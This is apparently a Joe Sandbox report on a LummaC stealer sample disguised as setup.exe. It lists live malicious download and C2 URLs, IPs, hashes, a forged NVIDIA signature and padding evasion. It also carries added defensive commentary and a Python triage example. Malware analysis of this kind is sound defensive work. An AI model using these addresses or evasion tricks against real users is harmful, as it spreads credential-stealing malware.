                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icosetup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://fairiespar.cyou/pisetup.exe, 00000000.00000002.1508503088.0000000000819000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1376392754.0000000000888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://ocsp.thawte.com0setup.exefalse
                                                                            high
                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://cegu.shop/8574262446/ph.txt?setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                https://fairiespar.cyou/let_setup.exe, 00000000.00000003.1417396097.00000000008F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://ocsp.rootca1.amazontrust.com0:setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://certificates.starfieldtech.com/repository/1604setup.exefalse
                                                                                    high
                                                                                    https://www.ecosia.org/newtab/setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.symauth.com/cps0(setup.exefalse
                                                                                        high
                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brsetup.exe, 00000000.00000003.1402013171.00000000040CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://fairiespar.cyou/XBWQPeasetup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1494951035.0000000003E69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://klipvumisui.shop/setup.exe, setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://ac.ecosia.org/autocomplete?q=setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://klipvumisui.shop/int_clp_sha.txtIesetup.exe, 00000000.00000003.1507348456.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.1508941560.00000000008DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              unknown
                                                                                              http://crl.starfieldtech.com/repository/0setup.exefalse
                                                                                                high
                                                                                                http://www.remobjects.com/psUsetup.exefalse
                                                                                                  high
                                                                                                  http://www.symauth.com/rpa00setup.exefalse
                                                                                                    high
                                                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://fairiespar.cyou/wsetup.exe, 00000000.00000003.1417396097.00000000008F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://fairiespar.cyou:443/apiwssetup.exe, 00000000.00000003.1417974487.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413835147.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1429890611.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1494951035.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413619922.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1418330853.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413958336.0000000003E6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://klipvumisui.shop/)setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      unknown
                                                                                                      https://fairiespar.cyou/usetup.exe, 00000000.00000003.1417396097.00000000008F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.remobjects.com/pssetup.exefalse
                                                                                                        high
                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://dfgh.online/invoker.php?compName=hZpowershell.exe, 0000000A.00000002.1515220136.00000000051A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.3 | fairiespar.cyou | European Union | 13335 | CLOUDFLARENETUS | true
185.161.251.21 | cegu.shop | United Kingdom | 5089 | NTLGB | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1585368
Start date and time: 2025-01-07 15:25:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 21s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: setup.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/3@3/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 8
• Number of non-executed functions: 5
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7332 because it is empty
• Execution Graph export aborted for target setup.exe, PID 5916 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: setup.exe
Time | Type | Description
09:26:18 | API Interceptor | 9x Sleep call for process: setup.exe modified
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          188.114.97.3DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.uzshou.world/ricr/
                                                                                                          Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.cifasnc.info/8rr3/
                                                                                                          Gg6wivFINd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                          • unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
                                                                                                          Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.cifasnc.info/8rr3/
                                                                                                          dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                                                          • /api/get/free
                                                                                                          dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                                                          • /api/get/free
                                                                                                          RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.rgenerousrs.store/o362/
                                                                                                          A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.beylikduzu616161.xyz/2nga/
                                                                                                          Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                          • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                                                          ce.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • paste.ee/d/lxvbq
                                                                                                          185.161.251.21'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                            SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                              Set-UpFile_v25.exeGet hashmaliciousLummaCBrowse
                                                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                  installer_1.05_36.8.exeGet hashmaliciousLummaCBrowse
                                                                                                                    setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                        installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            cegu.shop'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 185.161.251.21
Set-UpFile_v25.exe | malicious | LummaC | 185.161.251.21
Setup.exe | malicious | LummaC | 185.161.251.21
installer_1.05_36.8.exe | malicious | LummaC | 185.161.251.21
setup.exe | malicious | LummaC | 185.161.251.21
Setup.exe | malicious | LummaC | 185.161.251.21
installer_1.05_36.7.exe | malicious | LummaC Stealer | 185.161.251.21
Setup.exe | malicious | LummaC | 185.161.251.21
Match | Associated sample name / URL | Detection | Threat name | Context
CLOUDFLARENETUS
  setup.msi | malicious | Unknown | 188.114.97.3
  Airbornemx_PAYOUT7370.odt | malicious | Unknown | 104.17.25.14
  https://ipfs.io/ipfs/bafybeifkk7tuizumzirz7qfuxbcoggonud2b6gcvttaa7ewfdgltpybls4/index1.html?err=KHPGKXW3AEO13L6ZGUK&dispatch=B34&id=2849c1C900c31C62B159B3002c63C5#engineering@vanas.eu | malicious | Unknown | 104.17.24.14
  'Set-up.exe | malicious | LummaC | 104.21.25.52
  SET_UP.exe | malicious | LummaC | 188.114.97.3
  Set-UpFile_v25.exe | malicious | LummaC | 104.21.25.52
  Setup.exe | malicious | LummaC | 104.21.80.1
  https://sos-ch-gva-2.exo.io/ready/seah/continue/complete-this-to-continue.html | malicious | CAPTCHA Scam ClickFix | 104.17.25.14
  te13.exe | malicious | Metasploit | 104.21.16.1
  New order 2025.msg | malicious | PureLog Stealer, Snake Keylogger | 188.114.97.3
NTLGB
  'Set-up.exe | malicious | LummaC | 185.161.251.21
  SET_UP.exe | malicious | LummaC | 185.161.251.21
  Set-UpFile_v25.exe | malicious | LummaC | 185.161.251.21
  Setup.exe | malicious | LummaC | 185.161.251.21
  ppc.elf | malicious | Mirai | 86.15.78.37
  installer_1.05_36.8.exe | malicious | LummaC | 185.161.251.21
  setup.exe | malicious | LummaC | 185.161.251.21
  https://pwv95gp5r-xn--r3h9jdud-xn----c1a2cj-xn----p1ai.translate.goog/sIQKSvTC/b8KvU/uoTt6?ZFhObGNpNXBiblp2YkhabGJXVnVkRUJ6YjNWMGFHVnliblJ5ZFhOMExtaHpZMjVwTG01bGRBPT06c1JsOUE+&_x_tr_sch=http&_x_tr_sl=hrLWHGLm&_x_tr_tl=bTtllyql | malicious | HTMLPhisher | 194.168.231.153
  Setup.exe | malicious | LummaC | 185.161.251.21
Match | Associated sample name / URL | Detection | Threat name | Context
a0e9f5d64349fb13191bc781f81f42e1 (JA3 client fingerprint)
  'Set-up.exe | malicious | LummaC | 188.114.97.3, 185.161.251.21
  SET_UP.exe | malicious | LummaC | 188.114.97.3, 185.161.251.21
  Set-UpFile_v25.exe | malicious | LummaC | 188.114.97.3, 185.161.251.21
  Setup.exe | malicious | LummaC | 188.114.97.3, 185.161.251.21
  LVkAi4PBv6.exe | malicious | Unknown | 188.114.97.3, 185.161.251.21
  64pOGv7k4N.exe | malicious | LummaC | 188.114.97.3, 185.161.251.21
  BnJxmraqlk.exe | malicious | LummaC, PrivateLoader | 188.114.97.3, 185.161.251.21
  NjFiIQNSid.exe | malicious | LummaC | 188.114.97.3, 185.161.251.21
  H565rymIuO.doc | malicious | Unknown | 188.114.97.3, 185.161.251.21
  w3245.exe | malicious | Unknown | 188.114.97.3, 185.161.251.21
                                                                                                                            No context
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):64
                                                                                                                            Entropy (8bit):0.7307872139132228
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Nlllul4/X:NllU4/
                                                                                                                            MD5:3C34689C4BD27F7A51A67BBD54FA65C2
                                                                                                                            SHA1:E444E6B6E24D2FE2ACE5A5A7D96A6142C2368735
                                                                                                                            SHA-256:4B7DAB4629E6B8CC1CD6E404CB5FC110296C3D0F4E3FDBBDB0C1CE48B5B8A546
                                                                                                                            SHA-512:02827A36A507539C617DFE05EDF5367EB295EB80172794D83F3E9AF612125B7CA88218C2601DFA8E0E98888061A0C7B0E78428188523FA915F39B23F148F8766
                                                                                                                            Malicious:false
                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                            Preview:@...e.................................,.........................
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Reputation:high, very likely benign file
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Reputation:high, very likely benign file
Preview:# PowerShell test file to determine AppLocker lockdown mode
This entry and the identical one above are the AppLocker policy probe that powershell.exe writes on its own at startup (one .ps1 and one .psm1 copy of the same 60-byte text); they are artefacts of the PowerShell host, not files dropped by the sample, which is why both carry a benign reputation.
                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):0.4402487451613905 (very low for a 74 MB PE: the image is overwhelmingly NUL or otherwise repeated bytes, i.e. it has been padded to inflate its size, a common way to push a sample above the upload limits of AV and sandbox services)
                                                                                                                            TrID:
                                                                                                                            • Win32 Executable (generic) a (10002005/4) 98.88%
                                                                                                                            • Inno Setup installer (109748/4) 1.08%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                            File name:setup.exe
                                                                                                                            File size:74'584'760 bytes
                                                                                                                            MD5:76f2e89ace5c9b36679ce13b57c8b752
                                                                                                                            SHA1:736b004b46dfb5d0fef7758406883a22f15b1649
                                                                                                                            SHA256:16c3793c3deafcfb489b2347d08bfd0a420ce0f8c27dd4afeea05d9d9a99f413
                                                                                                                            SHA512:b7f872efbae47b45e72e4f05ef46d17506f117019b2fabd78e0a672f3ebc3ce924986ddceaae900afbb85382041d8bc8cf50f8cb5ef798796b89c768b6283a3a
                                                                                                                            SSDEEP:24576:2+QSkqgnQNDa5lZeGvyErqPW+UHx+/uxVrwiFx7ssa+7:27XqdG7qw3VrTFpsP
                                                                                                                            TLSH:F6F77DED6F1022E187CBEFEDE91293C9F9D85102231116FF239B054AD5EAED84232D59
                                                                                                                            File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                            Icon Hash:2d2e3797b32b2b99
                                                                                                                            Entrypoint:0x49b840
                                                                                                                            Entrypoint Section:CODE
                                                                                                                            Digitally signed:true
                                                                                                                            Imagebase:0x400000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC] (the fixed stamp emitted by the Borland/Delphi linker rather than a real build time; consistent with the Inno Setup TrID match above)
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:1
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:1
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:1
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:c1220b6b9a0c9ddea463bab3a99b594f
Signature Valid:false (the embedded Authenticode signature does not verify against the image, so the NVIDIA Corporation identity below confers no trust; a well-known signer on a non-verifying signature points to a certificate block copied from a legitimate binary or to an image modified after signing)
Signature Issuer:CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232 (0x80096010, TRUST_E_BAD_DIGEST: the hash carried in the signature does not match the hash of the image)
Not Before:27/07/2015 20:00:00
Not After:26/07/2018 19:59:59 (long expired at the time of analysis, although expiry alone would not produce a bad-digest error)
Subject Chain:CN=NVIDIA Corporation, O=NVIDIA Corporation, L=SANTA CLARA, S=California, C=US
                                                                                                                            Version:3
                                                                                                                            Thumbprint MD5:F7219078FBE20BC1B98BF8A86BFC0396
                                                                                                                            Thumbprint SHA-1:30632EA310114105969D0BDA28FDCE267104754F
                                                                                                                            Thumbprint SHA-256:1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2
                                                                                                                            Serial:14781BC862E8DC503A559346F5DCC518
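The three static facts above (8-bit entropy of 0.44 on a 74 MB image, the 1992 link timestamp, and an embedded but non-verifying Authenticode signature) can be reproduced without a sandbox. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample's author: it builds a constructed PE32 image (not the analysed setup.exe) with the Borland/Delphi timestamp, an optional block of NUL padding and a dummy WIN_CERTIFICATE entry, measures entropy and NUL padding, and computes the Authenticode image hash the way the Windows verifier does (CheckSum field, security data-directory entry and certificate table excluded). Padding a signed file changes that hash while leaving the certificate table in place, which is exactly the combination of "Digitally signed: true" and "Signature Valid: false" seen here. The names build_pe, triage and the 64-byte 0xAA "certificate" blob are assumptions of the example.

```python
import hashlib
import math
import re
import struct
from collections import Counter

# Fixed link-time stamp written by the Borland/Delphi linker (0x2A425E19 = 1992-06-19 22:22:17 UTC).
# Inno Setup installers carry it, so a 1992 timestamp on a current installer is expected, not forged.
DELPHI_TIMESTAMP = 0x2A425E19


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def nul_padding_ratio(data: bytes, min_run: int = 64) -> float:
    """Share of the file taken by its longest run of NUL bytes (size-inflation padding)."""
    longest = max((m.end() - m.start() for m in re.finditer(rb"\x00{%d,}" % min_run, data)), default=0)
    return longest / len(data) if data else 0.0


def pe_layout(data: bytes) -> dict:
    """Pull the header fields needed below out of a PE32/PE32+ image; ValueError if it is not a PE."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4  # Machine, NumberOfSections, TimeDateStamp, PtrSym, NumSym, SizeOfOptionalHeader, Characteristics
    _, nsect, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    plus = struct.unpack_from("<H", data, opt)[0] == 0x20B      # PE32+ has a wider optional header
    dirs = opt + (112 if plus else 96)
    sec_dir = dirs + 4 * 8                                       # IMAGE_DIRECTORY_ENTRY_SECURITY entry
    sect_table = opt + opt_size
    # (PointerToRawData, SizeOfRawData) per section header; both sit at +16 in the 40-byte header
    sections = [struct.unpack_from("<II", data, sect_table + 40 * i + 16)[::-1] for i in range(nsect)]
    cert_off, cert_size = struct.unpack_from("<II", data, sec_dir)
    return {"timestamp": timestamp, "checksum_off": opt + 64, "sec_dir_off": sec_dir,
            "size_of_headers": struct.unpack_from("<I", data, opt + 60)[0],
            "sections": sections, "cert_off": cert_off, "cert_size": cert_size}


def authenticode_hash(data: bytes, algo: str = "sha256") -> str:
    """Image hash as the Windows Authenticode verifier computes it: everything except the CheckSum
    field, the security data-directory entry and the certificate table; headers first, then the
    sections in file order, then any trailing 'extra data' that is not the certificate table."""
    pe = pe_layout(data)
    h = hashlib.new(algo)
    h.update(data[:pe["checksum_off"]])
    h.update(data[pe["checksum_off"] + 4:pe["sec_dir_off"]])
    h.update(data[pe["sec_dir_off"] + 8:pe["size_of_headers"]])
    hashed = pe["size_of_headers"]
    for ptr, size in sorted(s for s in pe["sections"] if s[1]):
        h.update(data[ptr:ptr + size])
        hashed += size
    extra = len(data) - hashed - pe["cert_size"]
    if extra > 0:                            # appended bytes land here, so they change the hash
        h.update(data[hashed:hashed + extra])
    return h.hexdigest()


def triage(data: bytes) -> dict:
    """The static checks the report lists, computed from the bytes alone."""
    pe = pe_layout(data)
    return {"entropy": round(shannon_entropy(data), 3),
            "nul_padding_ratio": round(nul_padding_ratio(data), 3),
            "delphi_linker": pe["timestamp"] == DELPHI_TIMESTAMP,
            "has_signature": pe["cert_size"] > 0,
            "authenticode_sha256": authenticode_hash(data)}


def build_pe(padding: int = 0, checksum: int = 0, cert_blob: bytes = b"\xAA" * 64) -> bytes:
    """Constructed PE32 image for this example (not the analysed setup.exe): one .text section of
    deterministic pseudo-random bytes, `padding` NUL bytes after it, then a dummy WIN_CERTIFICATE
    entry standing in for a real PKCS#7 signature."""
    sect_off, sect_size = 0x200, 0x1000
    x, payload = 0x12345678, bytearray()
    for _ in range(sect_size):               # LCG keeps the section content reproducible offline
        x = (1103515245 * x + 12345) & 0xFFFFFFFF
        payload.append(x >> 24)
    cert = struct.pack("<IHH", 8 + len(cert_blob), 0x0200, 0x0002) + cert_blob
    cert_off = sect_off + sect_size + padding
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                         # e_lfanew
    coff = b"PE\x00\x00" + struct.pack("<HHIIIHH", 0x14C, 1, DELPHI_TIMESTAMP, 0, 0, 0xE0, 0x10F)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                            # PE32 magic
    struct.pack_into("<I", opt, 60, sect_off)                        # SizeOfHeaders
    struct.pack_into("<I", opt, 64, checksum)                        # CheckSum (not covered by the hash)
    struct.pack_into("<II", opt, 96 + 4 * 8, cert_off, len(cert))   # security directory entry
    sect = b".text\x00\x00\x00" + struct.pack("<IIII", sect_size, 0x1000, sect_size, sect_off)
    headers = bytes(dos) + coff + bytes(opt) + sect.ljust(40, b"\x00")
    return headers.ljust(sect_off, b"\x00") + bytes(payload) + b"\x00" * padding + cert


if __name__ == "__main__":
    for pad in (0, 60 * 1024):
        print(pad, triage(build_pe(padding=pad)))
```

On a real file, replace build_pe() with the file's bytes; the resulting hash then has to be compared with the messageDigest inside the PKCS#7 SignedData in the certificate table, which this example does not parse. The entropy and padding checks are the cheap first filter: a multi-megabyte installer whose entropy sits well below 1 bit per byte is not a compressed Inno Setup payload, whatever its TrID says.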
Instruction (entrypoint disassembly: the run of calls is the Delphi unit-initialisation sequence, and the push 0049B904h / push dword ptr fs:[eax] / mov dword ptr fs:[eax], esp that follows installs the program's SEH frame; nothing here is specific to the stealer payload, which is unpacked later by the installer)
                                                                                                                            push ebp
                                                                                                                            mov ebp, esp
                                                                                                                            add esp, FFFFFFF4h
                                                                                                                            push ebx
                                                                                                                            push esi
                                                                                                                            push edi
                                                                                                                            call 00007FBC34A5B463h
                                                                                                                            call 00007FBC34A5D732h
                                                                                                                            call 00007FBC34A5E3E9h
                                                                                                                            call 00007FBC34A61A7Ch
                                                                                                                            call 00007FBC34A61CABh
                                                                                                                            call 00007FBC34A68A82h
                                                                                                                            call 00007FBC34A68AF5h
                                                                                                                            call 00007FBC34A6AA40h
                                                                                                                            call 00007FBC34A710DFh
                                                                                                                            call 00007FBC34A7CF56h
                                                                                                                            call 00007FBC34A8751Dh
                                                                                                                            call 00007FBC34A88A80h
                                                                                                                            call 00007FBC34AA4AAFh
call 00007FBC34AAA652h
call 00007FBC34AAAAF1h
call 00007FBC34AAC4B0h
call 00007FBC34AADEA3h
call 00007FBC34AB19FAh
call 00007FBC34AB28C9h
call 00007FBC34AB403Ch
call 00007FBC34ABF1ABh
call 00007FBC34AC72F6h
call 00007FBC34AD2E99h
call 00007FBC34ADD7B8h
call 00007FBC34AF09B7h
xor eax, eax
push ebp
push 0049B904h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
push 00000001h
call 00007FBC34A5DACEh
call 00007FBC34AF36A5h
mov eax, 0049B580h
push eax
push 0049B58Ch
mov eax, dword ptr [0049E624h]
call 00007FBC34A7C470h
call 00007FBC34AF36D3h
xor eax, eax
pop edx
pop ecx
pop ecx
mov dword ptr fs:[eax], edx
jmp 00007FBC34AF399Bh
jmp 00007FBC35A5AED4h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa0000 | 0x2622 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xae000 | 0x64400 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x471d8f8 | 0x39c0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
